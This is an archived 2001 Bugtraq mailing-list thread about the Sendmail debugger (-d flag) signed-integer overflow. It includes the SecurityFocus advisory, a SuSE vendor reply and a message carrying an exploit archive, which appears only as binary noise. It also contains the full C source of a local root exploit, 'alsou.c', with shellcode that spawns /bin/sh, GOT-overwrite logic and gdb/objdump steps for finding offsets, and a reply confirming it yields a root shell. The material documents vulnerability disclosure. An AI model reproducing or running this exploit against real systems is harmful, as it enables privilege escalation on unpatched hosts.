6948730 2001-08-21 10:04 -0600 /309 rader/ Dave Ahmed <da@securityfocus.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21 18:27 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18881>
Ärende: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger Arbitrary
------------------------------------------------------------
Code Execution Vulnerability (fwd)
From: Dave Ahmed <da@securityfocus.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.30.0108210958500.2723-100000@mail>
This alert is being posted to Bugtraq as our public release of the
vulnerability discovered in Sendmail by Cade Cairns
<cairnsc@securityfocus.com>.
---------------------------------------------------------------------------
Security Alert
Subject: Sendmail Debugger Arbitrary Code Execution Vulnerability
BUGTRAQ ID: 3163 CVE ID: CAN-2001-0653
Published: August 17, 2001 MT Updated: August 20, 2001 MT
Remote: No Local: Yes
Availability: Always Authentication: Not Required
Credibility: Vendor Confirmed Ease: No Exploit Available
Class: Input Validation Error
Impact: 10.00 Severity: 7.50 Urgency: 6.58
Last Change: Updated packages that rectify this issue are now
available
from Sendmail.
---------------------------------------------------------------------------
Vulnerable Systems:
Sendmail Consortium Sendmail 8.12beta7
Sendmail Consortium Sendmail 8.12beta5
Sendmail Consortium Sendmail 8.12beta16
Sendmail Consortium Sendmail 8.12beta12
Sendmail Consortium Sendmail 8.12beta10
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
Sendmail Consortium Sendmail 8.11.3
Sendmail Consortium Sendmail 8.11.2
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11
Non-Vulnerable Systems:
Summary:
Sendmail contains an input validation error, may lead to the
execution of arbitrary code with elevated privileges.
Impact:
Local users may be able to write arbitrary data to process memory,
possibly allowing the execution of code/commands with elevated
privileges.
Technical Description:
An input validation error exists in Sendmail's debugging
functionality.
The problem is the result of the use of signed integers in the
program's tTflag() function, which is responsible for processing
arguments supplied from the command line with the '-d' switch and
writing the values to it's internal "trace vector." The vulnerability
exists because it is possible to cause a signed integer overflow by
supplying a large numeric value for the 'category' part of the debugger
arguments. The numeric value is used as an index for the trace vector.
Before the vector is written to, a check is performed to ensure
that the supplied index value is not greater than the size of the
vector. However, because a signed integer comparison is used, it
is possible to bypass the check by supplying the signed integer
equivalent of a negative value. This may allow an attacker to
write data to anywhere within a certain range of locations in
process memory.
Because the '-d' command-line switch is processed before the
program drops its elevated privileges, this could lead to a
full system compromise. This vulnerability has been successfully
exploited in a laboratory environment.
Attack Scenarios:
An attacker with local access must determine the memory offsets of
the program's internal tTdvect variable and the location to which
he or she wishes to have data written.
The attacker must craft in architecture specific binary code the
commands (or 'shellcode') to be executed with higher privilege. The
attacker must then run the program, using the '-d' flag to overwrite a
function return address with the location of the supplied shellcode.
Exploits:
Currently the SecurityFocus staff are not aware of any exploits for
this issue. If you feel we are in error or are aware of more recent
information, please mail us at: vuldb@securityfocus.com
<mailto:vuldb@securityfocus.com>.
Mitigating Strategies:
Restrict local access to trusted users only.
Solutions:
Below is a statement from the Sendmail Consortium regarding this
issue:
--------------------
This vulnerability, present in sendmail open source versions between
8.11.0 and 8.11.5 has been corrected in 8.11.6. sendmail 8.12.0.Beta
users should upgrade to 8.12.0.Beta19. The problem was not present in
8.10 or earlier versions. However, as always, we recommend using the
latest version. Note that this problem is not remotely exploitable.
Additionally, sendmail 8.12 will no longer uses a set-user-id root
binary by default.
--------------------
Updated packages that rectify this issue are available from the
vendor:
For Sendmail Consortium Sendmail 8.11:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.1:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.2:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.3:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.4:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.11.5:
Sendmail Consortium upgrade sendmail 8.11.6
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.tar.gz
For Sendmail Consortium Sendmail 8.12beta10:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta12:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta16:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta5:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
For Sendmail Consortium Sendmail 8.12beta7:
Sendmail Consortium upgrade sendmail 8.12.0 Beta19
ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.0.Beta19.tar.gz
Credit:
Discovered by Cade Cairns <cairnsc@securityfocus.com> of the
Security Focus SIA Threat Analysis Team.
References:
web page:
Sendmail Homepage (Sendmail)
http://www.sendmail.org/
ChangeLog:
Aug 20, 2001: Updated packages that rectify this issue are now
available from Sendmail.
Aug 20, 2001: Updated versions of Sendmail will be available today at
4:00 PDT.
Aug 09, 2001: Initial analysis.
---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT
BUGTRAQ ID: This is a unique identifier assigned to the
vulnerability by SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the
vulnerability by the CVE.
Published: The date the vulnerability was first made
public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable
vulnerability.
Local: Whether this is a locally exploitable
vulnerability.
Credibility: Describes how credible the information about the
vulnerability is. Possible values are:
Conflicting Reports: The are multiple
conflicting about the existance of the
vulnerability.
Single Source: There is a single non-reliable
source reporting the existence of the
vulnerability.
Reliable Source: There is a single reliable
source reporting the existence of the
vulnerability.
Conflicting Details: There is consensus on the
existence of the vulnerability but not it's
details.
Multiple Sources: There is consensus on the
existence and details of the vulnerability.
Vendor Confirmed: The vendor has
confirmed the vulnerability.
Class: The class of vulnerability. Possible values are:
Boundary Condition Error, Access Validation Error,
Origin Validation Error, Input Valiadtion Error,
Failure to Handle Exceptional Conditions, Race
Condition Error, Serialization Error, Atomicity
Error, Environment Error, and Configuration Error.
Ease: Rates how easiliy the vulnerability can be
exploited. Possible values are: No Exploit
Available, Exploit Available, and No Exploit
Required.
Impact: Rates the impact of the vulnerability. It's range
is 1 through 10.
Severity: Rates the severity of the vulnerability. It's range
is 1 through 10. It's computed from the impact
rating and remote flag. Remote vulnerabiliteis with
a high impact rating receive a high severity
rating. Local vulnerabilities with a low impact
rating receive a low severity rating.
Urgency: Rates how quickly you should take action to fix or
mitigate the vulnerability. It's range is 1 through
10. It's computed from the severity rating, the
ease rating, and the credibility rating. High
severity vulnerabilities with a high ease rating,
and a high confidence rating have a higher urgency
rating. Low severity vulnerabilities with a low
ease rating, and a low confidence rating have a
lower urgency rating.
Last Change: The last change made to the vulnerability
information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a
system name indicates that one of the system
components is vulnerable vulnerable. For example,
Windows 98 ships with Internet Explorer. So if a
vulnerability is found in IE you may see something
like: Microsoft Internet Explorer + Microsoft
Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the
vulnerability.
Exploits: Exploit intructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the
vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability
record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com
https://alerts.securityfocus.com/
(6948730) /Dave Ahmed <da@securityfocus.com>/(Ombruten)
6949602 2001-08-21 21:28 +0200 /82 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21 21:51 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18890>
Kommentar till text 6948730 av Dave Ahmed <da@securityfocus.com>
Ärende: Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58): Sendmail Debugger
------------------------------------------------------------
Arbitrary Code Execution Vulnerability (fwd)
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108212117080.9532-100000@dent.suse.de>
>
> Subject: Sendmail Debugger Arbitrary Code Execution Vulnerability
[...]
> Vulnerable Systems:
>
> Sendmail Consortium Sendmail 8.12beta7
> Sendmail Consortium Sendmail 8.12beta5
> Sendmail Consortium Sendmail 8.12beta16
> Sendmail Consortium Sendmail 8.12beta12
> Sendmail Consortium Sendmail 8.12beta10
> Sendmail Consortium Sendmail 8.11.5
> Sendmail Consortium Sendmail 8.11.4
> Sendmail Consortium Sendmail 8.11.3
> Sendmail Consortium Sendmail 8.11.2
> Sendmail Consortium Sendmail 8.11.1
> Sendmail Consortium Sendmail 8.11
[...]
> Non-Vulnerable Systems:
Some part is missing here...
> Summary:
>
> Sendmail contains an input validation error, may lead to the execution
> of arbitrary code with elevated privileges.
[...]
> --------------------
> This vulnerability, present in sendmail open source versions between
> 8.11.0 and 8.11.5 has been corrected in 8.11.6. sendmail 8.12.0.Beta
> users should upgrade to 8.12.0.Beta19. The problem was not present in
> 8.10 or earlier versions. However, as always, we recommend using the
> latest version. Note that this problem is not remotely exploitable.
> Additionally, sendmail 8.12 will no longer uses a set-user-id root
> binary by default.
> --------------------
[...]
SuSE are currently working on update packages for the 7.0, 7.1 and 7.2
distributions (which are affected). The supported distributions 6.3 and
6.4 come with sendmail-8.9.3 which does not seem to be vulnerable to this
problem. The packages should be available shortly at
ftp://ftp.suse.com/pub/suse/i386/update/*.
Offtopic and mentioned here to keep the noise down (in.telnetd):
The 7.x distribution update directories contain update packages for
the recently discovered in.telnetd security problem (buffer
overflow). While we are working for a solution for the 6.x
distribution, the available packages are ready for use. It is
recommended to apply these updates as soon as possible. The packages
for the 7.1 distribution are called nkitserv.rpm, for 7.2 it's called
telnet-server.rpm. The packages for the 6.x distributions prove to
worksome because of a much older codebase and changed behaviour of
parts of the glibc. We hope to be able to provide a suitable solution
soon.
We recommend to disable the telnet service by commenting it out from
the /etc/inetd.conf file (with a following "killall -HUP inetd" to
make inetd re-read its config file) until an update package for your
distribution is available. If you do not need the telnet server
service, you should leave the service disabled even if you have
applied an update package to your system.
Thanks,
Roman Drahtmüller,
SuSE Security.
--
- -
| Roman Drahtmüller <draht@suse.de> // "Caution: Cape does |
SuSE GmbH - Security Phone: // not enable user to fly."
| Nürnberg, Germany +49-911-740530 // (Batman Costume warning label) |
- -
(6949602) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6955800 2001-08-22 21:02 +0300 /16 rader/ Lucian Hudin <luci@warp.transart.ro>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-22 20:35 av Brevbäraren
Extern mottagare: Dave Ahmed <da@securityfocus.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18904>
Kommentar till text 6948730 av Dave Ahmed <da@securityfocus.com>
Ärende: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58):
------------------------------------------------------------
Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
this is a simple slack sendmail exploit (rh 7.1 offste alos included)
it's so funny to see an old bug striking again...
Regards,
LucySoft Inc.
www : http://www.darkpath.com
mail: luci@transart.ro (work), luci@darkpath.com (home)
(6955800) /Lucian Hudin <luci@warp.transart.ro>/----
Bilaga (application/octet-stream) i text 6955801
6955801 2001-08-22 21:02 +0300 /9 rader/ Lucian Hudin <luci@warp.transart.ro>
Bilagans filnamn: "xp.tar.gz"
Importerad: 2001-08-22 20:35 av Brevbäraren
Extern mottagare: Dave Ahmed <da@securityfocus.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18905>
Bilaga (text/plain) till text 6955800
Ärende: Bilaga (xp.tar.gz) till: sample exploit....Re: *ALERT* UPDATED BID 3163 (URGENCY 6.58):
------------------------------------------------------------
Sendmail Debugger Arbitrary Code Execution Vulnerability (fwd)
ã; xp.tar íY{oÛ6ï¿ã§¸¹Ig'õM-kl@²uIX»(Kµ$z¢+èúÝw¤Vâô1É6Ô´È»ãñø;ÞÊçú£û&ÃèCÃÀ_Ãwå¯aözê·¤GÆpfϦ±?пwË2ÒàQ9ÁÇùX" ¥|®çó®s¯càzb½ïZÿ~_¶UëßÃgÓ´Þ#0îÕª¾ðõ'ú Dó`±Ñ æ|ÆLYÌòìk8Íëî¥]"e\æÑ,L{`© DH»ÆRÕ¨k]¤DÂ\¦q# Ôu&LÀÈáPs`(Î ¸,£ ·Æ¨4_óϳÐ
óYÑÉ#w2cúÃ/xIW¯Äõ4¡ë:ØHºH@|FF#ØO/½N·Íñàà)Dü
MÙm[¦7Ò6Ôܬ涹]æHî<^gw©QòhFî4jo2{Þ©ÆVCHñ6WfÈnwÙmj©^Cj´j|§9D¾Bú}Iê]ýú ü|Æcï$@xÌS\¹ ÁfÀ¯X²H4eq!Å6AÊe6q®ÇT
.³³)Ð$¡×˱¨âJËÕôx» ÇÖ$¦®
o1@!×{¹eã
!d"S*Í%p!Uw 5
iÌçÌ3
¨AD?K¬àD3!"EÝÀóXÂp
/Ð6´ÆÎRÒoPÌarBãà¥ÑJÛoÝ
CHÏD¢;kÐÁ¨KETÙ#iâø¼J\u¡ËJ j+È8¡ÖV¸ë¨ÂÕê hÍVRb)U
8
² .Ñ+jôÞBÚSp*
Þ®Ö¢ÆRÈ2$z?
ôÞi-ÕÀ¼e-í3Îq Ö
V¯i¸×<ýOyRXB*UÝÙÒ
ÜE<FµaÙ©ð®@ãÓdK¢Êñpãjéi9´µ§Úeóoî×å;vÊ÷òud´ÎSÈbLc&·/\ï:Ì&E´)3nóû
rã9Ø#ÈhCdÅmù@©£A1>_ýöºCÞÕs3
·ÌÀK÷êÖP\êºgr°%÷¶g°¯ëÔïV\xÐn0meÎìµbN<ª¶Á¬ÔuV´¬ê¨ö¦§°Ô¿m¾îì}Pb ¼vk«lº¯âV¾}Dmõá~Ç)&5¶Êñ|¾_Ê-ì;FÆ^©Y*Ú7Ãgú¤Ùgy©4h²+7}ì?qÔ®íí½¥÷Þ70)co~ÝÆs|ðç]m«ÓP
«¶D³±WàÅC·U
×.ßÖÎücØ¥0¼åʹnwÓô/©ô7É.£h£ÊÎ;m6ö>i
EævûFlwê
æà '-/E·j.
èYãÞx0´Æ}Ø©bn®öVÁ½â0+=yèßòÉM °F7üu
¹Á6t4»ZâF×R¾´×ú£[Ul4JO^1PI@dh),pe3¬®L¾àÉëù¦°â=ù·KExþÃÿ~Çç¿a¿ÿÁó`Õç?ËÊó>®ÏAäòìùÑçÀ¹I.~8>=èrµ©ðÉñËãg/.¿?=l¼:_àuÖ¸ÔPu«0
$¨aY$¹A;óK¡»0ëA
ûûoÎ^¼|EIE~_2±£
a@¯+°ã'¸ÏiêOô¿ñ÷7noäÂ
ç¯6¶¾zµñ8ä
áÕÆSüg3õªÁóÉÆrZLBqtrv¸è?Õÿüîç5¸ÇW'
NõÜD=hp./¹jÂÞ.'G?]èç'ÏF¥¿Üy¸ß6"jvÿ°¯
ã_-ç}^}âþûeü÷ú)ã0Ø]ÇÿCP}|h0ÅckÍlÈÒiÙT·aáµÛeîÃ,oà_CLEúm&ÿNü²IÝÿ÷;Ƨò¿¹[ßÿâ>!ïÿMÓ²Öñÿôøëeª']Y©ãÀª"(òY¢ê_ä*>PÀNH
ð:ºÿñ~|xtv|c|*ÿïuýß+ò¿µÎÿCͱÈßZ|í
îx4â Ûú*E^Û¿²Ëç GL bå%põ±
mìÚ!S«·¾;}(*òòû0Ü:8ê§ò³PºtÒ4à±¼]çhV"àçêÀm3yª§ÁÔO˲_S¦7ùqú
©o÷]6Gh¬>Y³)24¸úµÞ£Ö´¦5iMkZÓGÍ[N= (
(6955801) /Lucian Hudin <luci@warp.transart.ro>/(Ombruten)
6957305 2001-08-23 04:40 +0400 /5 rader/ Alexander Yurchenko <grange@rt.mipt.ru>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 03:30 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18913>
Ärende: Another sendmail exploit
------------------------------------------------------------
Here's an another sendmail exploit for linux x86.
Alexander Yurchenko aka grange
(6957305) /Alexander Yurchenko <grange@rt.mipt.ru>/-
Bilaga (text/plain) i text 6957306
6957306 2001-08-23 04:40 +0400 /107 rader/ Alexander Yurchenko <grange@rt.mipt.ru>
Bilagans filnamn: "alsou.c"
Importerad: 2001-08-23 03:30 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18914>
Bilaga (text/plain) till text 6957305
Ärende: Bilaga (alsou.c) till: Another sendmail exploit
------------------------------------------------------------
/*
* alsou.c
*
* sendmail-8.11.x linux x86 exploit
*
* To use this exploit you should know two numbers: VECT and GOT.
* Use gdb to find the first:
*
* $ gdb -q /usr/sbin/sendmail
* (gdb) break tTflag
* Breakpoint 1 at 0x8080629
* (gdb) r -d1-1.1
* Starting program: /usr/sbin/sendmail -d1-1.1
*
* Breakpoint 1, 0x8080629 in tTflag ()
* (gdb) disassemble tTflag
* .............
* 0x80806ea <tTflag+202>: dec %edi
* 0x80806eb <tTflag+203>: mov %edi,0xfffffff8(%ebp)
* 0x80806ee <tTflag+206>: jmp 0x80806f9 <tTflag+217>
* 0x80806f0 <tTflag+208>: mov 0x80b21f4,%eax
* ^^^^^^^^^^^^^^^^^^ address of VECT
* 0x80806f5 <tTflag+213>: mov %bl,(%esi,%eax,1)
* 0x80806f8 <tTflag+216>: inc %esi
* 0x80806f9 <tTflag+217>: cmp 0xfffffff8(%ebp),%esi
* 0x80806fc <tTflag+220>: jle 0x80806f0 <tTflag+208>
* .............
* (gdb) x/x 0x80b21f4
* 0x80b21f4 <tTvect>: 0x080b9ae0
* ^^^^^^^^^^^^^ VECT
*
* Use objdump to find the second:
* $ objdump -R /usr/sbin/sendmail |grep setuid
* 0809e07c R_386_JUMP_SLOT setuid
* ^^^^^^^^^ GOT
*
* Probably you should play with OFFSET to make exploit work.
*
* Constant values, written in this code found for sendmail-8.11.4
* on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
* GOT = 0x0809e07c.
*
* To get r00t type ./alsou and then press Ctrl+C.
*
*
* grange <grange@rt.mipt.ru>
*
*/
#include <sys/types.h>
#include <stdlib.h>
#define OFFSET 1000
#define VECT 0x080baf20
#define GOT 0x0809f544
#define NOPNUM 1024
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
unsigned int get_esp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[])
{
char *egg, s[256], tmp[256], *av[3], *ev[2];
unsigned int got = GOT, vect = VECT, ret, first, last, i;
egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
if (egg == NULL) {
perror("malloc()");
exit(-1);
}
sprintf(egg, "EGG=");
memset(egg + 4, 0x90, NOPNUM);
sprintf(egg + 4 + NOPNUM, "%s", shellcode);
ret = get_esp() + OFFSET;
sprintf(s, "-d");
first = -vect - (0xffffffff - got + 1);
last = first;
while (ret) {
i = ret & 0xff;
sprintf(tmp, "%u-%u.%u-", first, last, i);
strcat(s, tmp);
last = ++first;
ret = ret >> 8;
}
s[strlen(s) - 1] = '\0';
av[0] = "/usr/sbin/sendmail";
av[1] = s;
av[2] = NULL;
ev[0] = egg;
ev[1] = NULL;
execve(*av, av, ev);
}
(6957306) /Alexander Yurchenko <grange@rt.mipt.ru>/-
6961052 2001-08-23 09:33 +0200 /50 rader/ Michael Kjorling <michael@kjorling.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-23 16:30 av Brevbäraren
Extern mottagare: Bugtraq <bugtraq@securityfocus.com>
Mottagare: Bugtraq (import) <18919>
Kommentar till text 6957305 av Alexander Yurchenko <grange@rt.mipt.ru>
Ärende: Re: Another sendmail exploit [local root compromise]
------------------------------------------------------------
From: Michael Kjorling <michael@kjorling.com>
To: Bugtraq <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108230920350.8982-100000@varg.wolfpack>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18 confirmed vulerable
to this local root exploit with mail's shell both blank (meaning
/bin/bash) and /usr/sbin/smrsh 8.11 (Berkeley) 5/19/1998. I got dumped
into a root bash shell both times when starting this program as an
ordinary user. Sendmail 8.11.6 on same platform is confirmed *not* to
be vulerable under the same two setups (with and without smrsh). smrsh
with 8.11.6 does not have an explicit version number but mentions
@(#)$Id: smrsh.c,v 8.31.4.9 2001/04/24 04:11:51 ca Exp $.
Is this the command line processing but mentioned at
http://www.sendmail.org/8.11.html?
Michael Kjörling
On Aug 23 2001 04:40 +0400, Alexander Yurchenko wrote:
> Here's an another sendmail exploit for linux x86.
>
> Alexander Yurchenko aka grange
- --
Michael Kjörling - michael@kjorling.com - PGP: 8A70E33E
Manager Wolf.COM -- Programmer -- Network Administrator
"We must be the change we wish to see" (Mahatma Gandhi)
^..^ Support the wolves in Norway -- go to ^..^
\/ http://home.no.net/ulvelist/protest_int.htm \/
***** Please only send me emails which concern me *****
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For my PGP key: http://michael.kjorling.com/contact/pgp.html
iD8DBQE7hLHfKqN7/Ypw4z4RAnclAJsEAoj0h7SKvLpyYBttCwXPAP5pJACfdysX
7y05P5ILqXr2E+aRRkW6Ev4=
=uf78
-----END PGP SIGNATURE-----
(6961052) /Michael Kjorling <michael@kjorling.com>/-